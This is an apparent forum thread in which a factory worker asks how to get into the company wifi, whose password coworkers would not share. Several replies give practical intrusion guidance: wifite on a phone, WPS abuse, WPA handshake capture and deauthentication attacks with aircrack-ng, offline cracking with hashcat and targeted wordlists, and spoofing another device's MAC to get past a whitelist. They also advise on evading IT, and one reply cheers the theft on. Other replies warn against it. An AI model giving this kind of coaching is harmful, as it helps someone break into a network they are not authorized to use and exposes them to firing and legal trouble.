So I work at a factory. It’s decent work, pays the bills. But I burn through my monthly data in a week from browsing my phone on breaks. I know there’s company wifi all over the building, but it’s intended for the office drones, not the plebs like me on the factory floor.
Some of the guys I’ve worked with knew the password and could use the wifi, but everyone I asked refused to share the password with me. I guess the didn’t want to risk getting in trouble? 🤷♂️
Anyway, a while back I learned about these pwnagotchi things, and from what I’ve found it would be exactly what I need to sniff out the password myself. But is this right?
Could someone who knows more about this tell me if I’m on the right track or not? Would this work, or would something else do better?
For the record, I only browse lemmy and a little Facebook at work, I’m not looking to download a bunch of stuff or bring a laptop to game on or anything. Just want to poke around the internet without using all my monthly data.
Wait for Mint unlimited $15 a month specials if you need unlimited. Shit rocks!
Not in a million times would I do this. IT would be able to sniff that out in a heartbeat. Sure, maybe no one will notice for a long while, but the instant you’re found you fired on the spot.
And lose that sweet factory line gig?
Congratulations for not being dependent on your job I guess?
I mean, if they don’t care about losing their job and income then go ahead I guess…
you shouldn’t do this for your own sake
I would never connect my personal devices to a company network. They can inspect your traffic.
For a simple setup you can do discreetly and without much technical knowledge try wifite on an old phone running netrunner (Kali for phones) and then crack the password on your home PC, or if they have wps enabled (surprisingly common on shitty corpo office WiFi where I live) the phone might just give you the password directly
If you can bring your laptop, you can sniff the wifi PSKs with Linux if you have a network card that supports promiscuous mode. After that, you can try to crack the PSKs into the actual password. If it’s simple, or if you have an idea of what it could be, it can be quickly cracked without spending any extra money. This process is basically the same thing the pwnagotchi does, except without all the fluff words and being a bit more manual.
If your laptop doesn’t have a network card that supports promiscuous mode, you can probably buy an external adapter that works for cheaper than a pwnagotchi.
If you want something more automated, there’s a suit of tools that can automatically perform the attack for you. It’s called aircrack-ng. You can easily run it with a kali linux live USB, which comes with the tool pre-installed. Examples here. And you can get kali from here.
It goes without saying, cracking passwords and accessing a password protected network can be illegal in most places, and you should only do it with permission (or at least, don’t get caught). Imho, fuck corporations, so idc if you steal their wifi.
PD: For the most part, IT probably won’t do anything. Big buildings have hundreds of devices connected, and especially phones on big wifi networks like to change IPs and jump from place to place, so it’s difficult to track a new device. I don’t know about Apple devices, but any relatively new Android device should generate a new MAC address for every new network it connects to. I think you can change that to generate a new MAC every time it connects to a known network, but that’s probably more suspicious than keeping a single MAC.
PPD: If they’re relatively serious, they will have a MAC whitelist for connecting to the network. In this case, after using the correct password, the AP/router will check your phone’s MAC for a list of allowed ones, and only let you in if it’s there. You can still get inside by sniffing another device’s MAC and impersonating it, Android phones let you manually set a MAC. This will, however, cause conflicts with that other device, so it’s suspicious and will probably get investigated further.
Nah, that used to work with WEP. Nowadays, anyone with half an axon is on something more secure.
WEP was even easier than this, as you could directly sniff the password. This method works with WPA/WPA2, which is what most wifi networks are on.
Really? ISTR I had to wait until enough traffic accumulates, then run some aircrack-ng computation, to make it happen, on WEP, and WPA was crackproof. Oh well, I must be misremembering, or maybe times have moved on.
Both attacks need to wait a while while sniffing traffic, because they want to capture auth frames.
In the case of WPA, the periodic auth frames aren’t enough to crack the password, so you need a full auth frame. Those full frames get sent when a device connects to the network, and you need to be listening at that same moment in order to catch it (which is why it takes a while). Tools like aircrack-ng can, additionally, do deauth attacks, which temporarily log a target device off the network. This prompts an immediate automatic log in again, that the user doesn’t even notice, but which sends the full auth frame with the PSK.
Once you have a PSK, you can crack it with john or hashcat (hashcat is faster, because of GPU acceleration). Strong passwords will be uncrackable, but you do have a chance with small or common passwords. With a relatively mid-low range PC, you can easily get millions of hashes per second, making large dictionaries (12B+ passwords) feasible. If you have an idea of what the password could be (name of the company with maybe a year at the end that will probably be within the last 10 years, for example), it’s trivial to check all possible combinations. Bruteforcing is also possible, but it will be limited to 8-9 characters in length (12-13 if only numerical) before becoming unfeasible.
Well, damn. Knowledge dropped. 🤘🏼
I’d say call front desk and let them patch you to IT support.
Also, btw my company has only guest wifi. (Workstations use wired LAN.) It’s not connected to the actual company network. It’s for visitors/customers, so they can use their notebooks/tablets while negotiating deals etc… It can also be used to do things like that, as long as it doesn’t interfere with customers.
Wi-Fi is likely cert-based, certificates being managed by mobile device management on managed devices.
No password to sniff.
In the off chance it’s not:
An alert pops up in a dashboard immediately. You lose your job.
Just kidding, the lowest-bidder network security team your factory pays is full of people who have only been there for a few months and either don’t know what to do or don’t care.
